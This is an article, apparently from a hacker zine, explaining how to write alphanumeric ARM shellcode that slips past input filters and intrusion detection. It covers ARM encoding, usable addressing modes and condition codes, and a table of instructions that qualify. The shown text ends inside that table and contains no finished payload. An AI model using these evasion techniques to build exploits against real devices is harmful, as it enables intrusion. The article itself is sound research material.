|=-------------------------------------------------------------------=|
|=-----------------=[ Alphanumeric RISC ARM Shellcode ]=-------------=|
|=-------------------------------------------------------------------=|
|=-------------------------------------------------------------------=|
|=--=[ Yves Younan (yyounan@fort-knox.org) / ace (ace@nologin.org]=--=|
|=----------=[ Pieter Philippaerts (pieter@mentalis.org) ]=----------=|
|=-------------------------------------------------------------------=|
0.- Introduction
1.- The ARM architecture
1.0 - The ARM Processor
1.1 - Coprocessors
1.2 - Addressing Modes
1.3 - Conditional Execution
1.4 - Example Instructions
1.5 - The Thumb Instruction Set
2.- Alphanumeric shellcode
2.0 - Alphanumeric bit patterns
2.1 - Addressing modes
2.2 - Conditional Execution
2.3 - The Instruction List
2.4 - Getting a known value in a register
2.5 - Writing to R0-R2
2.6 - Self-modifying Code
2.7 - The Instruction Cache
2.8 - Going to Thumb Mode
2.9 - Going to ARM mode
3.- Conclusion
4.- Acknowledgements
5.- References
A.- Shellcode Appendix
A.0 - Writable Memory
A.1 - Example Shellcode
A.2 - Resulting Bytes
--[ 0.- Introduction
With the sudden explosion of mobile devices, the ARM processor has
become one of the most widespread CPU cores in the world. ARM
processors offer a good trade-off between power usage and
processing power, which makes it an excellent candidate for mobile
and embedded devices. Most mobile phones and personal digital
assistants feature an ARM processor.
Only recently, however, these devices have become powerful enough
to let users connect over the internet to various services, and to
share information like we are used to on desktop PCs. Unfortunately,
this introduces a number of security risks.
Like PCs, native ARM applications are susceptible to attacks such
as buffer overflows and other improper input validation abuse. Since
up till recently only fully featured desktop computers were powerful
enough to connect to the internet and disseminate information in a
ubiquitous manner, most attacks have focussed on the dominant desktop
processor, which is the x86 processor.
Given the increased connectivity of ARM-based devices, and given the
potential for misuse of these devices (for instance, by making a
hacked phone call commercial numbers), attacks on these devices will
become much more common than is now the case.
A typical hurdle for exploit writers, is that the shellcode has to
pass one or more filtering methods before reaching the vulnerable
buffer. A filtering method is a method that does some simple input
validation, for instance by stringently checking that input matches
a particular predefined pattern. A popular regular expression for
example is [a-zA-Z0-9] (possibly extended with "space"). Intrusion
detection systems are also adding more checks to detect particular
patterns of op codes to detect attacks against applications.
For educational purposes, we describe in this article how to write
alphanumeric shellcode for ARM. This is important, because alphanumeric
strings typically pass more of these validation checks and tend to
survive more data transformations (such as conversions from one
encoding to another) than non-alphanumeric shellcode. Writing
alphanumeric shellcode was not considered easily doable on RISC
architectures, which use 4 byte instructions.
When we discuss the bits in a byte we will use the following
representation: the most significant bit is bit 7 and the least
significant bit is bit 0 in our discussion. The first byte of an
instruction is bit 31 to 24 and the last byte is bit 7 to 0.
--[ 1.- The ARM architecture
----[ 1.0 The ARM Processor
The ARM architecture is a 32-bit RISC architecture with 16 general
purpose registers available to regular programs and a status
register (actually there are more general purpose registers and
status registers but those are only used in exception modes and not
important for our discussion). Every instruction is 4 bytes long so
we must ensure that all 4 of these bytes are alphanumeric. This is
very different from the x86 architecture which has variable length
instructions. As a result, getting instructions to be completely
alphanumeric is harder on ARM than on x86.
Registers R0 to R12 are real general purpose registers that do not
have a dedicated purpose. Register R13 is used as a stack pointer
and can also be referred to as register SP. Register R14 is used as
the link register and is also referred to as LR. It contains the
return address for functions and exceptions. Register R15 contains
the current program counter and is also referred to as PC. Unlike
x86 architectures, we can directly read and write this register.
Reading from this register will return the currently executing
instruction + 8 bytes in ARM mode or the current instruction + 4
bytes in Thumb mode (see section 1.5). Writing to this register
causes execution to continue at this address.
A[31:0]
_________ /\ _________
| _____ | ALE || ABE |_____ |
| | || | || | || | |
| | \/ V || V \/ |i|
| | +--------------------+ |n|
| | | Address Register | |c|
| | +--------------------+ |r|
| | ^ || |e|
| | / \ || |m|
| | |P| \/ |e|
| | |C| +-----------+ |n|
| |____ | | | Address |__|t|
| ____ | |b| |Incrementer|__ e| +-----------+
| | || |u| +-----------+ |r| | Scan |
| | \/ |s| | | | Control |
| | +---------------------+ |b| +-----------+
| | | Register Bank | |u| +-----------+<- DBGRQI
| | |(31x32-bit registers)| |s| | |<- BREAKPTI
| | | (6 status registers)|<----+ | |-> DBGACK
| | +---------------------+ | |-> ECLK
|A| | | | | |-> nEXEC
|L| | | | ___ | |<- ISYNC
|U| | | +-------->| | | |<- BL[3:0]
| | | | +----------+ |B| | |<- APE
|b| | | | 32x8 | | | | |<- MCLK
|u| |A|<=>|Multiplier|<=>|b| | |<- nWAIT
|s| | | +----------+ |u| | |-> nRW
| | |b| ___________|s| |Instruction|-> MAS[1:0]
| | |u| | _________ | | Decoder |<- nIRQ
| | |s| || | | | & |<- nFIQ
| | | | \/ | | | Control |<- nRESET
| | | | +-------+ | | | Logic |<- ABORT
| | | | |Barrel | | | | |-> nTRANS
| | | | |Shifter| | | | |-> nMREQ
| | | | +-------+ | | | |-> nOPC
| | \ / || | | | |-> SEQ
| | v \/ | | | |-> LOCK
| | ------------ | | | |-> nCPI
| | \32-bit ALU/ | | | |<- CPA
| | ---------- | | | |<- CPB
| |__________|| | | | |-> nM[4:0]
|_____________| | | | |<- TBE
_____________________| | | |-> TBIT
|______________________| +-----------+-> HIGHZ
|| /\ /\
\/ || ||
+-------------------+ +---------------------------+
|Write Data Register| | Instruction pipeline |
+-------------------+ | & Read Data Register |
| ^ ^ || |& Thumb Instruction Decoder|
v | | || +---------------------------+
nENOUT|nENIN || /\
| ||____________________||
DBE |______________________|
||
\/
D[31:0]
There are many versions of the ARM processor, with version 6 adding
a large amount of new instructions. In this paper we try to remain
as broad as possible: our alphanumeric ARM shellcode should work on
all versions of the ARM processor. To this end, we will drop all
instructions that require a specific version of a processor.
However, we clearly note which instructions are dropped because they
are not alphanumeric and which instructions are dropped because of
compatibility constraints. This allows a shellcode writer who only
needs compatibility with a specific processor version to take
advantage of the extra instructions that may be available in that
processor.
----[ 1.1 Coprocessors
ARM processors can be extended with a number of coprocessors to
perform non-standard calculations and to avoid having to do these
calculations in software. ARM supports up to 16 coprocessors, each
of which has a unique identification number. Some processors might
need more than one identification number, in order to accommodate
large instruction sets. Coprocessors are available for memory
management, floating point operations, debugging, media,
cryptography, ...
When an ARM processor encounters an instruction it cannot process,
it sends the instruction out on the coprocessor bus. If a
coprocessor recognizes the instruction, it can execute it and
respond to the main processor. If none of the coprocessors respond,
an 'illegal instruction' exception is raised.
----[ 1.2 Addressing Modes
ARM has different addressing modes. We'll briefly discuss the
different addressing modes which are useful for writing our
shellcode.
----[ 1.2.0 Addressing modes for data processing
Most instructions will look like this:
<opcode>{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
For example:
ADDEQ r0, r1, #20
The shifter_operand is the third argument to an instruction. It
is 12 bits large and can be one of the following 11 possibilities.
When a <shift_imm> is specified below, this is an immediate that
is 4 bits large, meaning that it can be any value in the range of 0
to 31.
1. #immediate An immediate of 8 bits can be used as shifter
operand. The 8 bits immediate can optionally be rotated right by a
shift_imm.
2. <Rm> A register can be used as an argument.
3. <Rm>, LSL #<shift_imm> A register, which is logically shifted
left a shift_imm.
4. <Rm>, LSL <Rs> A register Rm is used as argument that is shifted
left by a second register Rs.
5. <Rm>, LSR #<shift_imm> A register, which is logically shifted
right by a shift_imm.
6. <Rm>, LSR <Rs> A register Rm is used as argument that is shifted
right by a second register Rs.
7. <Rm>, ASR #<shift_imm> A register, which is arithmetically
shifted right by a shift_imm.
8. <Rm>, ASR <Rs> A register, which is arithmetically shifted right
by a register.
9. <Rm>, ROR #<shift_imm> A register, which is rotated right by a
shift_imm.
10. <Rm>, ROR <Rs> A register, which is rotated right by a register.
11. <Rm>, RRX A register which is rotated right by one bit, with the
carry flag replacing the free bit. The carry flag is then replaced
with the bit which was rotated out.
----[ 1.2.1 Addressing modes for load/store word or unsigned byte
This is the general syntax for a load or store instruction:
LDR{<cond>}{B}{T} <Rd>, addressing_mode
For example:
LDRPLB r3, [r3, #-48]
Where addressing_mode is one of the following 6 possibilities. For
the loads and stores with translation (e.g. LDRBT), only the last 3
addressing modes are possible. If an exclamation mark is specified
at the end of the first 3 addressing modes (e.g. for addressing
mode 1, [<Rn>, #+/-<imm_12>]!), then the calculated address is
written back to Rn.
1. [<Rn>, #+/-<imm_12>]<!> Rn is the base address of the memory
location where Rd will be stored. Optionally a 12 bit immediate can
be used as offset. This offset is then added to the base address to
calculate the address to write to.
2. [<Rn>, +/-<Rm]<!> Rn is the base address of the memory location
where Rd will be stored and Rm will be used as offset for Rn.
3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!> Rn is the base address,
with Rm as offset. The Rm register is shifted by applying the <shift>
operation with a <shift_imm> as argument. <shift> is one of LSL, LSR,
ASR, ROR or RRX.
The following three addressing modes are essentially the same as the
above 3 addressing modes, except that they are post-indexed. That
means that Rn is used as the memory location for the load or store.
The calculation is done afterwards and written back into Rn.
4. [<Rn>], #+/-<imm_12>
5. [<Rn>], +/-<Rm>
6. [<Rn>], +/-<Rm>, <shift> #<shift_imm>
----[ 1.2.2 Addressing modes for load/store multiple
The general instruction syntax for multiple loads and stores looks
like this:
LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>{^}
For example:
LDMPLFA r5!, {r0, r1, r2, r6, r8, lr}
Addressing modes are one of the following 4 possibilities:
1. IA - Increment after In this addressing mode, Rn will be used as
a base address and the first memory location to read or write from.
The subsequent addresses will be calculated by incrementing the
previous address with 4.
2. IB - Increment before In this addressing mode, Rn will be used as
the base address. The first memory location to read or write from is
the base address + 4. Subsequent addresses will also be calculated
by incrementing the previous address with 4.
3. DA - Decrement after Rn is used as the base address, from that
register, the amount of registers multiplied by 4 is subtracted from
this base address. Then 4 is added to this address. This is used as
the first memory location to read or write from. Subsequent
addresses are calculated by incrementing the previous address
with 4.
4. DB - Decrement before Rn is used as the base address, from that
register, the amount of registers multiplied by 4 is subtracted from
this base address. This is used as the first memory location to read
or write from. Subsequent addresses are calculated by incrementing
the previous address with 4.
----[ 1.3 Conditional Execution
One of the features of the ARM processor is that it supports
conditional execution of instructions. This means that the
programmer can choose whether instructions will be executed or not,
depending on the value of one of the different status flags. This
has practical use to write, for instance, short if structures in a
more compact manner. Almost all ARM instructions support conditional
execution.
The conditional execution of an instruction is represented by adding
a suffix to the name of the instruction that denotes in which
circumstances it will be executed. Without this suffix, the
instruction will always be executed.
As a short example, consider the following C fragment:
if (err != 0)
printf("An error has occurred! Errorcode = %i\n", err);
else
printf("Everything is ok!\n");
GCC compiles the above code to:
cmp r1, #0
beq .L4
ldr r0, .L9
bl printf
b .L8
.L4:
ldr r0, .L9+4
bl puts
.L8:
With conditional execution, it could be rewritten as:
cmp r1, #0
ldrne r0, .L9
blne printf
ldreq r0, .L9+4
bleq puts
The 'ne' suffix means that the instruction will only be executed if
the contents of, in this case, R1 is not equal to 0. Similarly, the
'eq' suffix means that the instructions will be executed if the
contents of R1 is equal to 0.
----[ 1.4 Example Instructions
ARM instructions are grouped into a number of categories, and each
category has a similar bit layout. For illustration purposes, we
will list and discuss some of these groups here. This list is not
meant to be exhaustive or complete.
The first group of instructions are called 'data processing
instructions'. This group covers a broad range of operations, which
includes basic arithmetic and bitwise operations. Data processing
instructions can be called with two registers as operands, or with a
register and an immediate value. An example of each of these options
is show below.
31 28 27 26 25 24 21 20 19 16 15 12 11 7 6 5 4 3 0
+-----+--+--+--+------+--+-----+-----+------------+-----+-+---+
|cond | 0| 0| 0|opcode| S| Rn | Rd |shift amount|shift|0| Rm|
+-----+--+--+--+------+--+-----+-----+------------+-----+-+---+
Example: SUBPL r6, pc, r5, ror #2
0101 0 0 0 0010 0 1111 0110 00010 11 0 0101
31 28 27 26 25 24 21 20 19 16 15 12 11 8 7 0
+------+--+--+--+------+--+------+------+------+--------------+
| cond | 0| 0| 1|opcode| S| Rn | Rd |rotate| immediate |
+------+--+--+--+------+--+------+------+------+--------------+
Example: SUBPL r3, r1, #56
0101 0 0 1 0010 0 0001 0011 0000 00111000
A second set of important instructions, are the instructions used to
load bytes from the memory into registers, and to store the result
of calculations back into the memory. In our shellcode, we will
typically call them with an immediate offset as operand.
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+------+------+-------------+
|cond | 0| 1| 0| P| U| W| B| L| Rn | Rd | immediate |
+-----+--+--+--+--+--+--+--+--+------+------+-------------+
Example: LDRMIB r3, [pc, #-48]
0100 0 1 0 1 0 1 0 1 1111 0011 000000110000
An interesting alternative to loading and storing registers one at a
time, is to use the 'load/store multiple' instructions. The
instructions in this group all load or store multiple registers at
once. Bits 15 to 0 hold which registers will be operated on.
31 28 27 26 25 24 23 22 21 20 19 16 15 0
+-----+--+--+--+--+--+--+--+--+------+---------------+
|cond | 1| 0| 0| P| U| S| W| L| Rn | register list |
+-----+--+--+--+--+--+--+--+--+------+---------------+
Example: STMMIFD r5, {r0, r3, r4, r6, r8, lr}^
0100 1 0 0 1 0 1 0 0 0101 0100000101011001
The groups described in this section are only a small subset of the
different instruction categories. However, these four groups are the
most important ones in the context of this article.
----[ 1.5 The Thumb Instruction Set
Thumb mode is a mode in which the ARM processor can be set by
changing the T bit of the CPSR register to 1. In this mode, the
processor will use 16 bit instructions, which allows for better code
density. Only T variants of the ARM processor support this mode
(e.g. ARM4T), however as of ARMv6 Thumb support is mandatory.
Instructions executed in 32 bit mode are called ARM instructions,
while instructions executed in 16 bit mode are called Thumb
instructions. Since instructions are only 2 bytes large in Thumb mode,
it is easier to satisfy the alphanumeric constraints for instructions.
To this end, we discuss how to get into Thumb mode from ARM mode in
our shellcode. While our shellcode can run with only ARM instructions,
writing code in Thumb mode is more convenient and smaller, resulting
in less instructions and more compact shellcode. For programs already
running in Thumb mode, we discuss a way of going back to ARM mode.
Unlike ARM instructions, Thumb instructions do not support conditional
execution.
Given the fact that we can easily switch from ARM to Thumb and back
and that ARM mode can do everything that we need, even if no Thumb
mode is available, we achieve the broadest possible compatibility in
our shellcode.
--[ 2.- Alphanumeric shellcode
----[ 2.0 Alphanumeric bit patterns
A common problem for exploit writers is that their shellcode has to
survive one or more byte transformations, before triggering the
actual buffer overflow. These transformations could for instance be
text encoding conversions, but could also be related to parsing or
input validation. In most cases, alphanumeric bytes are likely to
get through unmodified. Therefore, having shellcode with only
alphanumeric instructions is sometimes necessary and often
preferred.
An alphanumeric instruction is an instruction where each of the four
bytes of the instruction is either an upper or lower case letter, or
a number. In particular, the bit patterns of these bytes must always
conform to the following constraints:
- Bit 7 must be set to 0
- Bit 6 or 5 must be set to 1
- If bit 5 is set, but bit 6 isn't, then bit 4 must also be set
These constraints do not eliminate all non-alphanumeric characters,
but they can be used as a rule of thumb to quickly dismiss most of
the invalid bytes. Each instruction will have to be checked whether
its bit pattern follows these conditions and under which
circumstances.
A potential problem for exploit writers is to get the return address
to also be alphanumeric. This is not further discussed in this
article as it strongly depends from situation to situation.
----[ 2.1 Addressing modes
In this section we will describe which addressing modes we can use
that will ensure that our shellcode is alphanumeric.
----[ 2.1.0 Addressing modes for data processing
1. #immediate
11 8 7 0
+--------+---------------------+
| rotate | imm_8 |
+--------+---------------------+
Since we can fully control the value of imm_8, we can ensure that it
is alphanumeric.
2. <Rm>
11 10 9 8 7 6 5 4 3 0
+--+--+--+--+--+--+--+--+-------+
| 0| 0| 0| 0| 0| 0| 0| 0| Rm |
+--+--+--+--+--+--+--+--+-------+
Since bits 6 and 5 are both 0, this type of addressing mode can not
be used in alphanumeric shellcode.
3. <Rm>, LSL #<shift_imm>
11 7 6 5 4 3 0
+-----------+--+--+--+--------+
| shift_imm | 0| 0| 0| Rm |
+-----------+--+--+--+--------+
As in addressing mode 2, bits 6 and 5 are 0, so it can not be
represented alphanumerically.
4. <Rm>, LSL <Rs>
11 8 7 6 5 4 3 0
+-----------+--+--+--+--------+
| Rs | 0| 0| 0| 1| Rm |
+-----------+--+--+--+--------+
Again, bits 6 and 5 are 0, so this addressing mode can not be used.
5. <Rm>, LSR #<shift_imm>
11 7 6 5 4 3 0
+-----------+--+--+--+--------+
| shift_imm | 0| 1| 0| Rm |
+-----------+--+--+--+--------+
Since bit 6 is 0, bits 5 and 4 must both be one. Only bit 5 is
one, we can not represent this addressing mode alphanumerically.
6. <Rm>, LSR <Rs>
11 8 7 6 5 4 3 0
+-----------+--+--+--+--------+
| Rs | 0| 0| 1| 1| Rm |
+-----------+--+--+--+--------+
Bit 6 is 0, but since bits 5 and 4 are both set to 1, we can use
this addressing mode in our alphanumeric shellcode. Register Rm
must be less than R10.
7. <Rm>, ASR #<shift_imm>
11 7 6 5 4 3 0
+-----------+--+--+--+--------+
| shift_imm | 1| 0| 0| Rm |
+-----------+--+--+--+--------+
Since bit 6 is set to 1, the only restriction on this addressing
mode is that Rm can not be R0.
8. <Rm>, ASR <Rs>
11 8 7 6 5 4 3 0
+-----------+--+--+--+--------+
| Rs | 0| 1| 0| 1| Rm |
+-----------+--+--+--+--------+
This bit pattern is alphanumeric and allows any register to be used
as Rm.
9. <Rm>, ROR #<shift_imm>
11 7 6 5 4 3 0
+-----------+--+--+--+--------+
| shift_imm | 1| 1| 0| Rm |
+-----------+--+--+--+--------+
Like addressing mode 8, this pattern is alphanumeric and any register
can be used as Rm.
10. <Rm>, ROR <Rs>
11 8 7 6 5 4 3 0
+-----------+--+--+--+--------+
| Rs | 0| 1| 1| 1| Rm |
+-----------+--+--+--+--------+
Since bits 6, 5 and 4 are set to 1, Rm must be smaller than R11.
11. <Rm>, RRX
11 10 9 8 7 6 5 4 3 0
+--+--+--+--+--+--+--+--+-------+
| 0| 0| 0| 0| 0| 1| 1| 0| Rm |
+--+--+--+--+--+--+--+--+-------+
This bit pattern is alphanumeric and any register can be used as Rm.
----[ 2.1.1 Addressing modes for load/store word or unsigned byte
1. [<Rn>, #+/-<imm_12>]<!>
11 0
+------------------------------+
| imm_12 |
+------------------------------+
Since we can fully control the value of imm_12, we can ensure that
it is alphanumeric.
2. [<Rn>, +/-<Rm>]<!>
11 10 9 8 7 6 5 4 3 0
+--+--+--+--+--+--+--+--+-------+
| 0| 0| 0| 0| 0| 0| 0| 0| Rm |
+--+--+--+--+--+--+--+--+-------+
This addressing mode can not be represented alphanumerically.
3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!>
11 7 6 5 4 3 0
+-----------+-----+--+--------+
| shift_imm |shift| 0| Rm |
+-----------+-----+--+--------+
- If shift is LSL, then bits 6 and 5 are 0. This is not
alphanumeric.
- If shift is LSR, then bit 6 is 0 and bit 5 is 1. But since bit 4
stays 0, it is not alphanumeric.
- If shift is ASR, then bit 6 is 1 and bit 5 is 0. This means that
it is alphanumeric as long as Rm is not R0.
- If shift is ROR or RRX, then bits 6 and 5 will be 1, which is
alphanumeric, regardless of the register used as Rm.
The other post-indexing addressing modes discussed above have
essentially the same bit layout for the last 12 bytes. They only
differ in that these modes will unset bit 24 in the load or store
instruction.
----[ 2.1.2 Addressing modes for load/store multiple
The increment addressing modes will set bit 23 in the load or store
instruction, while the decrement modes will unset bit 23. If bit 23
is set, then the instruction can not be represented
alphanumerically. So only the decrement addressing mode can be used
in alphanumeric shellcode.
----[ 2.2 Conditional Execution
Because the condition code of an instruction is encoded in the most
significant bits of the fourth byte of the instruction (bits 31-28),
the value of the condition code has a direct impact on the
alphanumeric properties of the instruction. As a result, only a
limited set of condition codes can be used in alphanumeric
shellcode. The table below lists all the condition codes and their
corresponding bit pattern:
[bitpattern] [name] [description]
0000 EQ Equal
0001 NE Not equal
0010 CS/HS Carry set/unsigned higher or same
0011 CC/LO Carry clear/unsigned lower
0100 MI Minus/negative
0101 PL Plus/positive or zero
0110 VS Overflow
0111 VC No overflow
1000 HI Unsigned higher
1001 LS Unsigned lower or same
1010 GE Signed greater than or equal
1011 LT Signed less than
1100 GT Signed greater than
1101 LE Signed less than or equal
1110 AL Always (unconditional) -
1111 (used for other purposes)
_| |_
| |
bit31 bit28
Remember that the most significant bit of a byte should always be
set to 0 in order to be alphanumeric, so this excludes the last
eight condition codes. In addition, the resulting byte must be at
least 0x30, so this excludes the first three condition codes too.
Unfortunately, 'AL' is one of the codes that cannot be used in
alphanumeric shellcode. This means that all ARM instructions must be
executed conditionally. In this article, we choose PL and MI as the
two condition codes that we will use. They are mutually exclusive,
so we can always ensure that an instruction gets executed by simply
adding the same instruction twice to the shellcode, once with the PL
suffix and once with the MI suffix.
----[ 2.3 The Instruction List
In our list of instructions, we make a distinction between SZ/SO
(should be zero/should be one) and IZ/IO (is zero/is one). We do this
because the ARM reference manual specifies that specific bits must
be set to 0 or 1 and others "should be" set to 0 or 1 (defined as SBZ
or SBO in the manual). However, on our test processor if we set a bit
marked as "should be" to something else, the processor throws an
undefined instruction exception. As such, we've considered should be
and must be to be equivalent for our discussion, but we note the
difference should this behavior be different in other processors
(since this would allow us to use many more instructions).
The table below lists all the instructions present in ARMv6. For
each instruction, we've checked some simple constraints that may not
be broken in order for the instruction to be alphanumeric. The main
focus of this table is the high order bits of the second byte of the
instruction (bits 23 to 20). The reason that only the high order bits
of this byte are included, is because the high order bits of the
first byte are set by the condition flags, and the high order bits
of the third and fourth byte are often set by the operands of the
instruction. When the table contains the value 'd' for a bit, it
means that the value of this bit depends on specific settings.
The final column contains a list of things that disqualify the
instruction for being used in alphanumeric shellcode.
Disqualification criteria are that at least one of the four bytes of
the instruction is either always too high to be alphanumeric, or
too low. In this column, the following conventions are used:
- 'IO' is used to indicate that one or more bits is always 1
- 'IZ' is used to indicate that one or more bits is always 0
- 'SO' is used to indicate that one or more bits should be 1
- 'SZ' is used to indicate that one or more bits should be 0
+-----------+--------+--+--+--+--+---------------------------+
|instruction|version |23|22|21|20|disqualifiers |
+-----------+--------+--+--+--+--+---------------------------+
|ADC | |1 |0 |1 |d |IO: 23 |
|ADD | |1 |0 |0 |d |IO: 23 |
|AND | |0 |0 |0 |d |IZ: 23-21 |
|B, BL | |d |d |d |d | |
|BIC | |1 |1 |0 |d |IO: 23 |
|BKPT |5+ |0 |0 |1 |0 |IO: 31, IZ: 22, 20 |
|BLX (1) |5+ |d |d |d |d |IO: 31 |
|BLX (2) |5+ |0 |0 |1 |0 |SO: 15, IZ: 22, 20 |
|BX |4T, 5+ |0 |0 |1 |0 |IO: 7, SO: 15, IZ 22, 20 |
|BXJ |5TEJ, 6+|0 |0 |1 |0 |SO: 15, IZ: 22, 20, 6, 4 |
|CDP | |d |d |d |d | |
|CLZ |5+ |0 |1 |1 |0 |IZ: 7-5 |
|CMN | |0 |1 |1 |1 |SZ: 15-13 |
|CMP | |0 |1 |0 |1 |SZ: 15-13 |
|CPS |6+ |0 |0 |0 |0 |SZ: 15-13, IZ 22-20 |
|CPY |6+ |1 |0 |1 |0 |IZ: 22, 20, 7-5, IO 23 |
|EOR | |0 |0 |1 |d | |
|LDC | |d |d |d |1 | |
|LDM (1) | |d |0 |d |1 | |
|LDM (2) | |d |1 |0 |1 | |
|LDM (3) | |d |1 |d |1 |IO: 15 |
|LDR | |d |0 |d |1 | |
|LDRB | |d |1 |d |1 | |
|LDRBT | |0 |1 |1 |1 | |
|LDRD |5TE+ |d |d |d |0 | |
|LDREX |6+ |1 |0 |0 |1 |IO: 23, 7 |
|LDRH | |d |d |d |1 |IO: 7 |
|LDRSB |4+ |d |d |d |1 |IO: 7 |
|LDRSH |4+ |d |d |d |1 |IO: 7 |
|LDRT | |d |0 |1 |1 | |
|MCR | |d |d |d |0 | |
|MCRR |5TE+ |0 |1 |0 |0 | |
|MLA | |0 |0 |1 |d |IO: 7 |
|MOV | |1 |0 |1 |d |IO: 23 |
|MRC | |d |d |d |1 | |
|MRRC |5TE+ |0 |1 |0 |1 | |
|MRS | |0 |d |0 |0 |SZ: 7-0 |
|MSR | |0 |d |1 |0 |SO: 15 |
|MUL | |0 |0 |0 |d |IO: 7 |
|MVN | |1 |1 |1 |d |IO: 23 |
|ORR | |1 |0 |0 |d |IO: 23 |
|PKHBT |6+ |1 |0 |0 |0 |IO: 23 |
|PKHTB |6+ |1 |0 |0 |0 |IO: 23 |
|PLD |5TE+, |d |1 |0 |1 |IO: 15 |
| |!5TExP | | | | | |
|QADD |5TE+ |0 |0 |0 |0 |IZ: 22-21 |
|QADD16 |6+ |0 |0 |1 |0 |IZ: 22, 20 |
|QADD8 |6+ |0 |0 |1 |0 |IZ: 22, 20, IO: 7 |
|QADDSUBX |6+ |0 |0 |1 |0 |IZ: 22, 20 |
|QDADD |5TE+ |0 |1 |0 |0 | |
|QDSUB |5TE+ |0 |1 |1 |0 | |
|QSUB |5TE+ |0 |0 |1 |0 |IZ: 22, 20 |
|QSUB16 |6+ |0 |0 |1 |0 |IZ: 22, 20 |
|QSUB8 |6+ |0 |0 |1 |0 |IZ: 22, 20, IO: 7 |
|QSUBADDX |6+ |0 |0 |1 |0 |IZ: 22, 20 |
|REV |6+ |1 |0 |1 |1 |IO: 23 |
|REV16 |6+ |1 |0 |1 |1 |IO: 23, 7 |
|REVSH |6+ |1 |1 |1 |1 |IO: 23, 7 |
|RFE |6+ |d |0 |d |1 |SZ: 14-13, 6-5 |
|RSB | |0 |1 |1 |d | |
|RSC | |1 |1 |1 |d |IO: 23 |
|SADD16 |6+ |0 |0 |0 |1 |IZ: 22-21 |
|SADD8 |6+ |0 |0 |0 |1 |IZ: 22-21, IO: 7 |
|SADDSUBX |6+ |0 |0 |0 |1 |IZ: 22-21 |
|SBC | |1 |1 |0 |d |IO: 23 |
|SEL |6+ |1 |0 |0 |0 |IO: 23 |
|SETEND |6+ |0 |0 |0 |0 |SZ: 14-13, IZ: 22-21, 6-5 |
|SHADD16 |6+ |0 |0 |1 |1 |IZ: 6-5 |
|SHADD8 |6+ |0 |0 |1 |1 |IO: 7 |
|SHADDSUBX |6+ |0 |0 |1 |1 | |
|SHSUB16 |6+ |0 |0 |1 |1 | |
|SHSUB8 |6+ |0 |0 |1 |1 |IO: 7 |
|SHSUBADDX |6+ |0 |0 |1 |1 | |
|SMLA<x><y> |5TE+ |0 |0 |0 |0 |IO: 7, IZ: 22-21 |
|SMLAD |6+ |0 |0 |0 |0 |IZ: 22-21 |
|SMLAL | |1 |1 |1 |d |IO: 23,7 |
|SMLAL<x><y>|5TE+ |0 |1 |0 |0 |IO: 7 |
|SMLALD |6+ |0 |1 |0 |0 | |
|SMLAW<y> |5TE+ |0 |0 |1 |0 |IZ: 22, 20, IO: 7 |
|SMLSD |6+ |0 |0 |0 |0 |IZ: 22-21 |
|SMLSLD |6+ |0 |1 |0 |0 | |
|SMMLA |6+ |0 |1 |0 |1 | |
|SMMLS |6+ |0 |1 |0 |1 |IO: 7 |
|SMMUL |6+ |0 |1 |0 |1 |IO: 15 |
|SMUAD |6+ |0 |0 |0 |0 |IZ: 22-21, IO: 15 |
|SMUL<x><y> |5TE+ |0 |1 |1 |0 |SZ: 15, IO: 7 |
|SMULL | |1 |1 |0 |d |IO: 23 |
|SMULW<x><y>|5TE+ |0 |0 |1 |0 |IZ: 22, 20,SZ: 14-13, IO: 7|
|SMUSD |6+ |0 |0 |0 |0 |IZ: 22-21, IO: 15 |
|SRS |6+ |d |1 |d |0 |SZ: 14-13, 6-5 |
|SSAT |6+ |1 |0 |1 |d |IO: 23 |
|SSAT16 |6+ |1 |0 |1 |0 |IO: 23 |
|SSUB16 |6+ |0 |0 |0 |1 |IZ: 22-21 |
|SSUB8 |6+ |0 |0 |0 |1 |IZ: 22-21, IO: 7 |
|SSUBADDX |6+ |0 |0 |0 |1 |IZ: 22-21 |
|STC |2+ |d |d |d |0 | |
|STM (1) | |d |0 |d |0 |IZ: 22, 20 |
|STM (2) | |d |1 |0 |0 | |
|STR | |d |0 |d |0 |IZ: 22, 20 |
|STRB | |d |1 |d |0 | |
|STRBT | |d |1 |1 |0 | |
|STRD |5TE+ |d |d |d |0 |IO: 7 |
|STREX |6+ |1 |0 |0 |0 |IO: 7 |
|STRH |4+ |d |d |d |0 |IO: 7 |
|STRT | |d |0 |1 |0 |IZ: 22, 20 |
|SUB | |0 |1 |0 |d | |
|SWI | |d |d |d |d | |
|SWP |2a, 3+ |0 |0 |0 |0 |IZ: 22-21, IO: 7 |
|SWPB |2a, 3+ |0 |1 |0 |0 |IO: 7 |
|SXTAB |6+ |1 |0 |1 |0 |IO: 23 |
|SXTAB16 |6+ |1 |0 |0 |0 |IO: 23 |
|SXTAH |6+ |1 |0 |1 |1 |IO: 23 |
|SXTB |6+ |1 |0 |1 |0 |IO: 23 |
|SXTB16 |6+ |1 |0 |0 |0 |IO: 23 |
|SXTH |6+ |1 |0 |1 |1 |IO: 23 |
|TEQ | |0 |0 |1 |1 |SZ: 14-13 |
|TST | |0 |0 |0 |1 |IZ: 22-21, SZ: 14-13 |
|UADD16 |6+ |0 |1 |0 |1 |IZ: 6-5 |
|UADD8 |6+ |0 |1 |0 |1 |IO: 7 |
|UADDSUBX |6+ |0 |1 |0 |1 | |
|UHADD16 |6+ |0 |1 |1 |1 |IZ: 6-5 |
|UHADD8 |6+ |0 |1 |1 |1 |IO: 7 |
|UHADDSUBX |6+ |0 |1 |1 |1 | |
|UHSUB16 |6+ |0 |1 |1 |1 | |
|UHSUB8 |6+ |0 |1 |1 |1 |IO: 7 |
|UHSUBADDX |6+ |0 |1 |1 |1 | |
|UMAAL |6+ |0 |1 |0 |0 |IO: 7 |
|UMLAL | |1 |0 |1 |d |IO: 23, 7 |
|UMULL | |1 |0 |0 |d |IO: 23, 7 |
|UQADD16 |6+ |0 |1 |1 |0 |IZ: 6-5 |
|UQADD8 |6+ |0 |1 |1 |0 |IO: 7 |
|UQADDSUBX |6+ |0 |1 |1 |0 | |
|UQSUB16 |6+ |0 |1 |1 |0 | |
|UQSUB8 |6+ |0 |1 |1 |0 |IO: 7 |
|UQSUBADDX |6+ |0 |1 |1 |0 | |
|USAD8 |6+ |1 |0 |0 |0 |IO: 23, 15, IZ: 6-5 |
